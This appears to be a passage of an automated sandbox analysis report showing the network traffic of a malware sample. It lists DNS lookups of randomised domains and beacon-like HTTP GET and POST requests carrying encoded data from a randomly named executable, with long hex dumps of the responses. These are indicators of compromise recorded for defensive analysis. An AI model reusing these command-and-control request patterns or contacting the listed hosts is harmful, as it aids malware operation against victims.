                              Dec 2, 2024 15:55:18.698854923 CET8049977104.21.24.198192.168.2.7
                              Dec 2, 2024 15:55:19.954665899 CET8049977104.21.24.198192.168.2.7
                              Dec 2, 2024 15:55:19.954734087 CET8049977104.21.24.198192.168.2.7
                              Dec 2, 2024 15:55:19.954873085 CET4997780192.168.2.7104.21.24.198
                              Dec 2, 2024 15:55:19.956495047 CET8049977104.21.24.198192.168.2.7
                              Dec 2, 2024 15:55:19.956608057 CET8049977104.21.24.198192.168.2.7
                              Dec 2, 2024 15:55:19.956684113 CET4997780192.168.2.7104.21.24.198
                              Dec 2, 2024 15:55:20.089140892 CET4997780192.168.2.7104.21.24.198
                              Dec 2, 2024 15:55:21.108136892 CET4998380192.168.2.7104.21.24.198
                              Dec 2, 2024 15:55:21.228204966 CET8049983104.21.24.198192.168.2.7
                              Dec 2, 2024 15:55:21.228302002 CET4998380192.168.2.7104.21.24.198
                              Dec 2, 2024 15:55:21.244126081 CET4998380192.168.2.7104.21.24.198
                              Dec 2, 2024 15:55:21.364037991 CET8049983104.21.24.198192.168.2.7
                              Dec 2, 2024 15:55:22.669255018 CET8049983104.21.24.198192.168.2.7
                              Dec 2, 2024 15:55:22.669270992 CET8049983104.21.24.198192.168.2.7
                              Dec 2, 2024 15:55:22.669325113 CET4998380192.168.2.7104.21.24.198
                              Dec 2, 2024 15:55:22.670469999 CET8049983104.21.24.198192.168.2.7
                              Dec 2, 2024 15:55:22.670514107 CET4998380192.168.2.7104.21.24.198
                              Dec 2, 2024 15:55:22.745434999 CET4998380192.168.2.7104.21.24.198
                              Dec 2, 2024 15:55:23.766976118 CET4998880192.168.2.7104.21.24.198
                              Dec 2, 2024 15:55:23.887866020 CET8049988104.21.24.198192.168.2.7
                              Dec 2, 2024 15:55:23.888056040 CET4998880192.168.2.7104.21.24.198
                              Dec 2, 2024 15:55:23.903778076 CET4998880192.168.2.7104.21.24.198
                              Dec 2, 2024 15:55:24.024148941 CET8049988104.21.24.198192.168.2.7
                              Dec 2, 2024 15:55:24.024326086 CET8049988104.21.24.198192.168.2.7
                              Dec 2, 2024 15:55:25.314714909 CET8049988104.21.24.198192.168.2.7
                              Dec 2, 2024 15:55:25.314733982 CET8049988104.21.24.198192.168.2.7
                              Dec 2, 2024 15:55:25.314883947 CET8049988104.21.24.198192.168.2.7
                              Dec 2, 2024 15:55:25.315028906 CET4998880192.168.2.7104.21.24.198
                              Dec 2, 2024 15:55:25.417490005 CET4998880192.168.2.7104.21.24.198
                              Dec 2, 2024 15:55:26.437973976 CET4998980192.168.2.7104.21.24.198
                              Dec 2, 2024 15:55:26.560266018 CET8049989104.21.24.198192.168.2.7
                              Dec 2, 2024 15:55:26.560367107 CET4998980192.168.2.7104.21.24.198
                              Dec 2, 2024 15:55:26.571739912 CET4998980192.168.2.7104.21.24.198
                              Dec 2, 2024 15:55:26.691853046 CET8049989104.21.24.198192.168.2.7
                              Dec 2, 2024 15:55:27.961287975 CET8049989104.21.24.198192.168.2.7
                              Dec 2, 2024 15:55:27.961313009 CET8049989104.21.24.198192.168.2.7
                              Dec 2, 2024 15:55:27.961338043 CET8049989104.21.24.198192.168.2.7
                              Dec 2, 2024 15:55:27.961352110 CET8049989104.21.24.198192.168.2.7
                              Dec 2, 2024 15:55:27.961374998 CET8049989104.21.24.198192.168.2.7
                              Dec 2, 2024 15:55:27.961390018 CET8049989104.21.24.198192.168.2.7
                              Dec 2, 2024 15:55:27.961407900 CET8049989104.21.24.198192.168.2.7
                              Dec 2, 2024 15:55:27.961471081 CET8049989104.21.24.198192.168.2.7
                              Dec 2, 2024 15:55:27.961560965 CET8049989104.21.24.198192.168.2.7
                              Dec 2, 2024 15:55:27.961575985 CET8049989104.21.24.198192.168.2.7
                              Dec 2, 2024 15:55:27.961594105 CET4998980192.168.2.7104.21.24.198
                              Dec 2, 2024 15:55:27.961643934 CET4998980192.168.2.7104.21.24.198
                              Dec 2, 2024 15:55:27.961643934 CET4998980192.168.2.7104.21.24.198
                              Dec 2, 2024 15:55:27.969588041 CET8049989104.21.24.198192.168.2.7
                              Dec 2, 2024 15:55:27.970705986 CET4998980192.168.2.7104.21.24.198
                              Dec 2, 2024 15:55:27.972323895 CET4998980192.168.2.7104.21.24.198
                              Dec 2, 2024 15:55:28.092219114 CET8049989104.21.24.198192.168.2.7

                              UDP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Dec 2, 2024 15:54:13.210357904 CET5982653192.168.2.71.1.1.1
                              Dec 2, 2024 15:54:13.788234949 CET53598261.1.1.1192.168.2.7
                              Dec 2, 2024 15:54:30.635068893 CET5881453192.168.2.71.1.1.1
                              Dec 2, 2024 15:54:31.134763956 CET53588141.1.1.1192.168.2.7
                              Dec 2, 2024 15:54:46.374255896 CET5559653192.168.2.71.1.1.1
                              Dec 2, 2024 15:54:46.942933083 CET53555961.1.1.1192.168.2.7
                              Dec 2, 2024 15:55:01.514724970 CET6296053192.168.2.71.1.1.1
                              Dec 2, 2024 15:55:02.343909979 CET53629601.1.1.1192.168.2.7
                              Dec 2, 2024 15:55:18.115888119 CET6036553192.168.2.71.1.1.1
                              Dec 2, 2024 15:55:18.436722040 CET53603651.1.1.1192.168.2.7

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Dec 2, 2024 15:54:13.210357904 CET192.168.2.71.1.1.10x1a03Standard query (0)www.duwixushx.xyzA (IP address)IN (0x0001)false
                              Dec 2, 2024 15:54:30.635068893 CET192.168.2.71.1.1.10xcf17Standard query (0)www.1qcczjvh2.autosA (IP address)IN (0x0001)false
                              Dec 2, 2024 15:54:46.374255896 CET192.168.2.71.1.1.10xe881Standard query (0)www.yvcp3.infoA (IP address)IN (0x0001)false
                              Dec 2, 2024 15:55:01.514724970 CET192.168.2.71.1.1.10xc84eStandard query (0)www.guacamask.onlineA (IP address)IN (0x0001)false
                              Dec 2, 2024 15:55:18.115888119 CET192.168.2.71.1.1.10x1d99Standard query (0)www.supernutra01.onlineA (IP address)IN (0x0001)false

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Dec 2, 2024 15:53:14.401393890 CET1.1.1.1192.168.2.70x22deNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                              Dec 2, 2024 15:53:14.401393890 CET1.1.1.1192.168.2.70x22deNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                              Dec 2, 2024 15:54:13.788234949 CET1.1.1.1192.168.2.70x1a03No error (0)www.duwixushx.xyz156.251.17.224A (IP address)IN (0x0001)false
                              Dec 2, 2024 15:54:31.134763956 CET1.1.1.1192.168.2.70xcf17No error (0)www.1qcczjvh2.autos1.1qcczjvh2.autosCNAME (Canonical name)IN (0x0001)false
                              Dec 2, 2024 15:54:31.134763956 CET1.1.1.1192.168.2.70xcf17No error (0)1.1qcczjvh2.autos1hong-fted.pels5zqo.shopCNAME (Canonical name)IN (0x0001)false
                              Dec 2, 2024 15:54:31.134763956 CET1.1.1.1192.168.2.70xcf17No error (0)1hong-fted.pels5zqo.shop1hong.pels5zqo.shopCNAME (Canonical name)IN (0x0001)false
                              Dec 2, 2024 15:54:31.134763956 CET1.1.1.1192.168.2.70xcf17No error (0)1hong.pels5zqo.shop129.226.153.85A (IP address)IN (0x0001)false
                              Dec 2, 2024 15:54:46.942933083 CET1.1.1.1192.168.2.70xe881No error (0)www.yvcp3.info47.254.140.255A (IP address)IN (0x0001)false
                              Dec 2, 2024 15:55:02.343909979 CET1.1.1.1192.168.2.70xc84eNo error (0)www.guacamask.online208.91.197.27A (IP address)IN (0x0001)false
                              Dec 2, 2024 15:55:18.436722040 CET1.1.1.1192.168.2.70x1d99No error (0)www.supernutra01.online104.21.24.198A (IP address)IN (0x0001)false
                              Dec 2, 2024 15:55:18.436722040 CET1.1.1.1192.168.2.70x1d99No error (0)www.supernutra01.online172.67.220.36A (IP address)IN (0x0001)false

                              HTTP Request Dependency Graph

                              • www.duwixushx.xyz
                              • www.1qcczjvh2.autos
                              • www.yvcp3.info
                              • www.guacamask.online
                              • www.supernutra01.online

                              HTTP Packets

                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.749825156.251.17.224805312C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe
                              TimestampBytes transferredDirectionData
                              Dec 2, 2024 15:54:13.926316023 CET528OUTGET /bmve/?l0W=Yh8P&cNeT5P=Rsosln+CouPFD70pouDpcL8MGxlXnptR0Qz9VzezY2yTYUIF1+nb00CRzlZGPtlDISGdoNhQK1cGxL7iAKAdX9QsE8jTEAf7iu+rTrEYDmOQoqL5x871qcXt+MmivaGg02pJqeyLSBOj HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                              Accept-Language: en-US,en;q=0.9
                              Host: www.duwixushx.xyz
                              Connection: close
                              User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                              Dec 2, 2024 15:54:15.558311939 CET691INHTTP/1.1 404 Not Found
                              Server: nginx
                              Date: Mon, 02 Dec 2024 14:54:15 GMT
                              Content-Type: text/html
                              Content-Length: 548
                              Connection: close
                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              1192.168.2.749862129.226.153.85805312C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe
                              TimestampBytes transferredDirectionData
                              Dec 2, 2024 15:54:31.274709940 CET803OUTPOST /od8t/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                              Accept-Language: en-US,en;q=0.9
                              Accept-Encoding: gzip, deflate, br
                              Host: www.1qcczjvh2.autos
                              Connection: close
                              Content-Length: 219
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: no-cache
                              Origin: http://www.1qcczjvh2.autos
                              Referer: http://www.1qcczjvh2.autos/od8t/
                              User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                              Data Raw: 63 4e 65 54 35 50 3d 65 55 34 42 51 56 6f 47 51 43 6e 4c 4d 71 6b 30 7a 49 52 30 68 69 2f 4d 6f 62 50 38 44 66 36 71 47 38 7a 76 4d 79 48 66 37 48 70 68 45 63 41 64 74 34 63 34 41 5a 71 75 6d 74 6d 47 56 44 34 75 31 41 30 2f 73 6a 71 37 48 76 49 4b 64 50 6b 63 4f 65 64 39 63 2b 43 31 53 6c 44 43 37 74 65 54 64 72 63 7a 43 41 4d 6b 4c 35 77 69 46 57 41 57 2b 4d 7a 38 4d 4f 6e 73 71 39 66 49 5a 2b 69 50 31 59 4a 30 32 67 57 68 42 4f 4d 64 46 75 66 56 67 73 36 73 52 67 5a 46 78 31 62 4d 5a 6f 79 78 31 2f 72 59 72 77 4e 53 46 4e 59 65 53 55 32 42 4f 77 67 74 2b 6b 65 66 6c 62 56 51 38 35 50 39 34 59 50 31 32 33 57 39 72 6c 61 76 63 6c 4a 75 2b 41 3d 3d
                              Data Ascii: cNeT5P=eU4BQVoGQCnLMqk0zIR0hi/MobP8Df6qG8zvMyHf7HphEcAdt4c4AZqumtmGVD4u1A0/sjq7HvIKdPkcOed9c+C1SlDC7teTdrczCAMkL5wiFWAW+Mz8MOnsq9fIZ+iP1YJ02gWhBOMdFufVgs6sRgZFx1bMZoyx1/rYrwNSFNYeSU2BOwgt+keflbVQ85P94YP123W9rlavclJu+A==
                              Dec 2, 2024 15:54:32.863445044 CET1236INHTTP/1.1 404 Not Found
                              Server: Tengine
                              Date: Mon, 02 Dec 2024 14:54:32 GMT
                              Content-Type: text/html; charset=utf-8
                              Content-Length: 58288
                              Connection: close
                              Vary: Accept-Encoding
                              ETag: "67344967-e3b0"
                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f [TRUNCATED]
                              Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%;padding-top: 12%;}.logo img { display: block; width: 100px;}.logo img + img { margin-top: 12px;}.title {margin-top: 24px;font-size: 110px;color: #333;letter-spacing: 10px;}.desc {font-size: 16px;color: #777;text-align: center;line-height: 24px;}.footer {/* position: absolute;left: 0;bottom: 32px;width: 100%; */margin-top: 24px;text-align: center;font-size: 12px;}.footer .btlink {color: #20a53a;text-decoration: no [TRUNCATED]
                              Dec 2, 2024 15:54:32.863485098 CET1236INData Raw: 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 0a 09 09 09 09 3c 69 6d 67 20 73 72 63 3d
                              Data Ascii: le></head><body><div class="container"><div class="logo"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAASwAAAEDCAYAAACPhzmWAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAt+wAALfsB/IdK5wAAABx0RVh0U29mdHdhcmUAQWRvYmUgRmlyZXdvcmtzIE
                              Dec 2, 2024 15:54:32.863497019 CET1236INData Raw: 59 37 33 42 72 51 47 72 32 75 44 72 39 4a 4f 4a 78 57 47 36 45 41 56 30 42 42 4f 51 37 78 46 39 4c 54 35 35 38 66 2b 69 52 48 56 59 6d 78 51 41 41 7a 32 46 47 7a 55 70 38 38 31 31 37 7a 44 64 70 54 4c 74 64 45 50 41 31 67 4a 4b 46 4e 46 66 6c 4d
                              Data Ascii: Y73BrQGr2uDr9JOJxWG6EAV0BBOQ7xF9LT558f+iRHVYmxQAAz2FGzUp88117zDdpTLtdEPA1gJKFNFflMXT5CYVVBMAXOChkWczTlx/Zse+bjq9aD5/Y3yLbYolkAIhw6Y3m2u/gzw0FEJjvGgKox2Pr9hOIx2G5EQJeL3jMIoldD934ptP9nKyRAT5c2IEY0+SVW00j4Uf7QDZHUVo3dvUJh4qcxjGwBtcz06NX9h7x+YauPa
                              Dec 2, 2024 15:54:32.863548040 CET1236INData Raw: 4f 41 41 41 45 4a 50 31 79 63 4b 63 4a 6e 4b 49 52 31 68 6b 32 50 54 62 58 6c 73 47 79 49 2b 4d 46 41 42 38 44 47 50 33 62 31 51 73 6a 62 71 65 6e 70 56 51 4e 4c 4e 45 6e 6e 30 6b 75 67 45 4f 4e 56 33 54 36 4e 4c 35 50 39 42 59 46 39 2f 7a 58 38
                              Data Ascii: OAAAEJP1ycKcJnKIR1hk2PTbXlsGyI+MFAB8DGP3b1QsjbqenpVQNLNEnn0kugEONV3T6NL5P9BYF9/zX8dzyjk2IaBKANsi386rV0BEM9WoOwhoa224FgOksKjbDTnNHAdhMYGYM/jX9vFVbwOylS1VW0H0PDuCZErqeirZOEiF57flzAkBKFmSP2jq57Mj4MgDWQRb4C86yWNol7z0SIzGWmM9MC1maZlPjFZ0mNS5DCm7776
                              Dec 2, 2024 15:54:32.863560915 CET1236INData Raw: 33 36 30 2b 5a 2b 38 34 72 4f 35 5a 44 78 66 58 4a 64 79 71 4c 4d 61 53 6c 5a 62 44 55 4e 4d 5a 53 62 67 4f 4a 49 42 67 41 48 46 50 51 6a 33 38 63 63 31 71 38 57 45 48 67 2b 4a 6b 41 4b 79 73 42 51 59 77 78 2f 37 4e 4a 31 2f 33 42 6d 42 38 67 6a
                              Data Ascii: 360+Z+84rO5ZDxfXJdyqLMaSlZbDUNMZSbgOJIBgAHFPQj38cc1q8WEHg+JkAKysBQYwx/7NJ1/3BmB8gj2RvZKRfZosnPksjZn4CjfC/IpoSQPiSxrZrxqJi84co2C09n2ayBoPnLtgx4wHySFu7EM8algthDCrYeAjIUdKqVHjpSihoruB0bRyAdjbsTXVLBwynwU1aQCX0KXDOG4RyINQBh5bg0A1gZRX04R+JxJiXRRJ7WC
                              Dec 2, 2024 15:54:32.863600016 CET1236INData Raw: 45 47 48 76 61 58 36 4d 74 67 61 79 63 62 51 6a 77 66 61 48 49 68 69 54 70 36 6a 73 64 47 32 68 45 53 61 70 67 36 33 35 61 67 56 2f 54 72 65 59 59 49 36 70 47 37 34 48 39 68 38 2f 50 45 4e 47 58 7a 64 68 70 64 78 72 31 62 79 49 37 4f 33 75 6b 6c
                              Data Ascii: EGHvaX6MtgaycbQjwfaHIhiTp6jsdG2hESapg635agV/TreYYI6pG74H9h8/PENGXzdhpdxr1byI7O3ukl5cXB2CoHVP+TnrOcrZ+Y3X6qPeH8NetLNSKqCxupZQq46PbnZZrCS/qgaEV+F1vrvo5CH7etopNmKFgAf+/isGo9wfQBEBjyAn4tX01qutq4LO2cze+Al/tWRCLc6RNhxzW5vNfq37sOpz/IHpR+oYrJz4OVKnHvl
                              Dec 2, 2024 15:54:32.863621950 CET776INData Raw: 30 6b 74 69 74 4f 31 6e 5a 52 55 34 31 41 6e 79 30 6f 36 68 39 78 61 72 51 71 76 56 32 75 6a 4f 43 52 63 55 2b 4d 53 58 75 2b 34 56 45 33 67 66 77 49 65 77 49 38 42 46 42 65 7a 55 70 59 7a 6c 62 64 66 77 49 54 4e 62 4a 6a 78 68 77 56 47 58 39 7a
                              Data Ascii: 0ktitO1nZRU41Any0o6h9xarQqvV2ujOCRcU+MSXu+4VE3gfwIewI8BFBezUpYzlbdfwITNbJjxhwVGX9zuOltCq+0B1FjcDHfDnhRy8QNbHTJbs5if8mDEZ9OYNRP9Bg1D9wUpMhT//+rMHJkFdoRa1aXkrwDflg0da0syUCDkKrHgJCDHKkgQDWALjGFsXtcLQPTqUNEGi2VRL7rz+zYkOT4BqvH7v/R1U1J7xYQuu9ctedy+
                              Dec 2, 2024 15:54:32.863635063 CET1236INData Raw: 67 62 79 6b 48 77 43 44 59 63 46 59 41 34 4b 39 56 7a 65 74 51 73 31 79 4c 74 78 5a 73 55 71 46 47 2b 62 31 51 71 32 52 6e 52 62 67 4a 4c 59 58 68 75 76 6c 74 38 42 51 4f 77 41 69 35 70 4a 72 44 46 43 66 53 66 51 6b 42 35 6b 79 4c 61 57 6a 4d 2f
                              Data Ascii: gbykHwCDYcFYA4K9VzetQs1yLtxZsUqFG+b1Qq2RnRbgJLYXhuvlt8BQOwAi5pJrDFCfSfQkB5kyLaWjM/G97H9se21Fi0jW5f1TCR635atXVE6smxq5cXtY7oKGK45VU1W0C4DMA8Qaj/nODUV+rGP37u7gF28GEsEpibWBHJeSaCsqaAMDdumWD060Se2Sq7K9RzXg6oO8dBQvtkSwq9j81HXGEfiGRmQxstBLbTJN5GVsRKS
                              Dec 2, 2024 15:54:32.863879919 CET1236INData Raw: 2f 32 41 30 6b 67 31 46 66 77 68 43 72 6e 77 44 43 66 73 6a 72 6e 62 62 7a 57 2f 4d 67 51 6c 61 51 6c 33 62 30 35 54 75 70 58 51 63 76 32 56 49 4a 4c 39 63 37 42 37 58 77 61 41 41 75 68 79 39 77 49 48 4d 2b 76 4c 6a 31 6b 4f 4f 78 41 4f 41 71 47
                              Data Ascii: /2A0kg1FfwhCrnwDCfsjrnbbzW/MgQlaQl3b05TupXQcv2VIJL9c7B7XwaAAuhy9wIHM+vLj1kOOxAOAqGPuxOP0ulsPqUe8jE4BlD/5mYNV++mP/hmuDDywzi9bPCtoT4O2v1s29mpmyYf6JuCO9y4fU5on7zQH9DV/I29Z7DUb9BINRb3MR8G/kBGzLzIAB5dVmVg33kn/Jd9iM5Izr11Mz86/dWRpWLPExhTd/GQLfzUaTJs
                              Dec 2, 2024 15:54:32.863893032 CET393INData Raw: 6a 66 67 52 6b 4a 5a 57 33 41 54 69 69 51 5a 55 59 6f 4e 50 30 47 39 64 6d 5a 74 63 4f 43 7a 65 39 69 4b 37 50 58 59 44 41 76 32 54 44 50 67 55 36 36 6f 71 44 35 75 66 41 59 56 47 42 63 78 49 55 72 69 58 61 77 79 55 4f 71 31 65 39 38 4c 4f 51 67
                              Data Ascii: jfgRkJZW3ATiiQZUYoNP0G9dmZtcOCze9iK7PXYDAv2TDPgU66oqD5ufAYVGBcxIUriXawyUOq1e98LOQg8seIt2Uvdh4+fum5+9f6ww7tdnUnDA+pEGHfV8c2578tH/JFiqen+dgN3SQ035iDUa9rbWex8UeFAxZKAAD1FeSj3ZCVs4OyOLKdzKtPwZbRamywNGJ12pPWII6FeeBiq51mMfX7GuPv7LDCtgJ6P0LVmLP1btrjj


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              2192.168.2.749868129.226.153.85805312C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe
                              TimestampBytes transferredDirectionData
                              Dec 2, 2024 15:54:33.932549000 CET823OUTPOST /od8t/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                              Accept-Language: en-US,en;q=0.9
                              Accept-Encoding: gzip, deflate, br
                              Host: www.1qcczjvh2.autos
                              Connection: close
                              Content-Length: 239
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: no-cache
                              Origin: http://www.1qcczjvh2.autos
                              Referer: http://www.1qcczjvh2.autos/od8t/
                              User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                              Data Raw: 63 4e 65 54 35 50 3d 65 55 34 42 51 56 6f 47 51 43 6e 4c 4d 4f 67 30 78 72 4a 30 70 69 2f 4c 32 72 50 38 4e 2f 37 43 47 38 76 76 4d 33 6a 78 37 30 4e 68 64 38 51 64 73 39 77 34 42 5a 71 75 70 4e 6d 4a 59 6a 34 62 31 42 49 42 73 6d 4b 37 48 76 4d 4b 64 50 30 63 4f 49 56 79 66 4f 43 33 48 31 43 6b 6d 39 65 54 64 72 63 7a 43 41 5a 4c 4c 35 6f 69 46 43 45 57 78 49 76 7a 50 4f 6e 76 72 39 66 49 4f 4f 69 31 31 59 4a 4b 32 69 6a 70 42 4d 45 64 46 76 76 56 6a 35 61 6a 61 67 5a 50 75 46 61 54 4a 4e 47 2f 30 50 4c 33 74 47 39 4d 50 39 67 50 65 43 33 6a 55 53 73 42 67 31 6d 6b 68 5a 78 6d 72 66 53 49 36 5a 4c 74 37 56 69 63 30 53 2f 46 52 33 6f 71 6f 31 4d 6f 42 53 59 41 62 41 2f 4c 38 6e 47 6c 57 72 74 6a 39 74 30 3d
                              Data Ascii: cNeT5P=eU4BQVoGQCnLMOg0xrJ0pi/L2rP8N/7CG8vvM3jx70Nhd8Qds9w4BZqupNmJYj4b1BIBsmK7HvMKdP0cOIVyfOC3H1Ckm9eTdrczCAZLL5oiFCEWxIvzPOnvr9fIOOi11YJK2ijpBMEdFvvVj5ajagZPuFaTJNG/0PL3tG9MP9gPeC3jUSsBg1mkhZxmrfSI6ZLt7Vic0S/FR3oqo1MoBSYAbA/L8nGlWrtj9t0=
                              Dec 2, 2024 15:54:35.508409977 CET1236INHTTP/1.1 404 Not Found
                              Server: Tengine
                              Date: Mon, 02 Dec 2024 14:54:35 GMT
                              Content-Type: text/html; charset=utf-8
                              Content-Length: 58288
                              Connection: close
                              Vary: Accept-Encoding
                              ETag: "67344967-e3b0"
                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f [TRUNCATED]
